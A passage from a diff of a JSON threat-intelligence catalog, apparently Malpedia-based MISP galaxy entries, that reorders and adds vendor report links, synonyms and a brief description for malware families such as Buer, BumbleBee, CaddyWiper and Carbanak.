+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
@@ -15585,8 +16604,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap",
- "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
- "https://attack.mitre.org/software/S0043/"
+ "https://attack.mitre.org/software/S0043/",
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
],
"synonyms": [],
"type": []
@@ -15599,36 +16618,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.buer",
- "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
- "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
- "https://blog.minerva-labs.com/stopping-buerloader",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://twitter.com/StopMalvertisin/status/1182505434231398401",
- "http://www.secureworks.com/research/threat-profiles/gold-symphony",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://blog.group-ib.com/prometheus-tds",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
+ "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader",
+ "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "http://www.secureworks.com/research/threat-profiles/gold-symphony",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://twitter.com/StopMalvertisin/status/1182505434231398401",
+ "https://blog.minerva-labs.com/stopping-buerloader",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf",
+ "https://blog.group-ib.com/prometheus-tds",
"https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
+ "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace",
+ "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
@@ -15672,18 +16692,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://malware-research.org/carbanak-source-code-leaked/",
+ "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
+ "https://www.scythe.io/library/threatthursday-buhtrap",
"https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
"https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
"https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/",
- "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/",
- "https://www.scythe.io/library/threatthursday-buhtrap",
- "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
- "https://malware-research.org/carbanak-source-code-leaked/",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
- "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
+ "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/"
],
"synonyms": [
"Ratopak"
@@ -15698,47 +16718,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://isc.sans.edu/diary/rss/28636",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
- "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
- "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://isc.sans.edu/diary/rss/28664",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
"https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader",
- "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://www.youtube.com/watch?v=JoKJNfLAc0Y",
+ "https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://blog.krakz.fr/articles/bumblebee/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/",
"https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://blog.cerbero.io/?p=2617",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://threathunt.blog/bzz-bzz-bumblebee-loader",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
+ "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
+ "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
+ "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign",
+ "https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
+ "https://twitter.com/threatinsight/status/1648330456364883968",
"https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://community.riskiq.com/article/0b211905/description",
+ "https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads",
"https://isc.sans.edu/diary/28636",
- "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/"
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
+ "https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://isc.sans.edu/diary/rss/28636",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://isc.sans.edu/diary/rss/28664",
+ "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/",
+ "https://twitter.com/ESETresearch/status/1577963080096555008",
+ "https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf"
+ ],
+ "synonyms": [
+ "COLDTRAIN",
+ "SHELLSTING",
+ "Shindig"
],
- "synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6fc4beee-b922-4d25-833d-8fb574a3c56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "fa47d59d-7251-468f-9d84-6e1ba21887db",
"value": "BumbleBee"
},
@@ -15747,8 +16788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner",
- "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf",
- "https://www.f-secure.com/weblog/archives/00002249.html"
+ "https://www.f-secure.com/weblog/archives/00002249.html",
+ "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
],
"synonyms": [
"0zapftis",
@@ -15764,13 +16805,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
- "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
- "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
- "http://malware-traffic-analysis.net/2017/05/09/index.html",
"https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/",
- "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/"
+ "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
+ "http://malware-traffic-analysis.net/2017/05/09/index.html",
+ "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
+ "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/"
],
"synonyms": [],
"type": []
@@ -15814,12 +16855,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
"https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
"https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
+ "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/"
],
"synonyms": [],
"type": []
@@ -15856,37 +16897,46 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper",
+ "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
+ "https://twitter.com/silascutler/status/1513870210398363651",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
"https://n0p.me/2022/03/2022-03-26-caddywiper/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper",
- "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
+ "https://cybersecuritynews.com/destructive-data-wiper-malware/",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://www.nioguard.com/2022/03/analysis-of-caddywiper.html",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
- "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
- "https://twitter.com/ESETresearch/status/1503436420886712321",
- "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
"https://cert.gov.ua/article/39518",
- "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
- "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine",
+ "https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html",
"https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/",
- "https://twitter.com/silascutler/status/1513870210398363651",
+ "https://cert.gov.ua/article/3718487",
"https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html",
+ "https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine",
+ "https://twitter.com/HackPatch/status/1503538555611607042",
+ "https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/",
+ "https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://twitter.com/ESETresearch/status/1503436420886712321",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecuritynews.com/destructive-data-wiper-malware/",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
+ "https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://twitter.com/HackPatch/status/1503538555611607042",
- "https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html",
"https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine"
+ "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
],
"synonyms": [
"KillDisk.NCX"
@@ -15901,23 +16951,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy",
- "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets"
],
"synonyms": [
"Cadelle"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "38d6a0a1-0388-40d4-b8f4-1d58eeb9a07d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66",
"value": "CadelSpy"
},
@@ -15926,9 +16967,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn",
- "https://www.youtube.com/watch?v=3cUWjojQXWE",
"https://twitter.com/8th_grey_owl/status/1357550261963689985",
- "https://www.datanet.co.kr/news/articleView.html?idxno=133346"
+ "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://www.youtube.com/watch?v=3cUWjojQXWE"
],
"synonyms": [],
"type": []
@@ -15956,11 +16997,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader",
- "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
"https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/",
+ "https://blog.group-ib.com/prometheus-tds",
"https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/",
- "https://blog.group-ib.com/prometheus-tds"
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/"
],
"synonyms": [],
"type": []
@@ -15999,9 +17040,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon",
- "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html",
"https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/",
- "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html"
+ "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/"
],
"synonyms": [],
"type": []
@@ -16010,29 +17051,33 @@
"value": "Cannon"
},
{
- "description": "",
+ "description": "MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and to remote control.\r\n\r\nThe attacker deploy malware via spear phishing email to lure the user to open and run the malicious attachment that will infect the machine. The main objective of this campaign is primarily to remotely control the infected machine and gain control of the internal destinations of money processing services such as Automated Teller Machines(ATM) and financial accounts. The following information are the malware capabilities:\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
- "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://threatintel.blog/OPBlueRaven-Part2/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://unit42.paloaltonetworks.com/atoms/mulelibra/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
- "https://threatintel.blog/OPBlueRaven-Part1/",
- "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
- "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://threatintel.blog/OPBlueRaven-Part2/",
+ "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
"https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html"
+ "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://threatintel.blog/OPBlueRaven-Part1/",
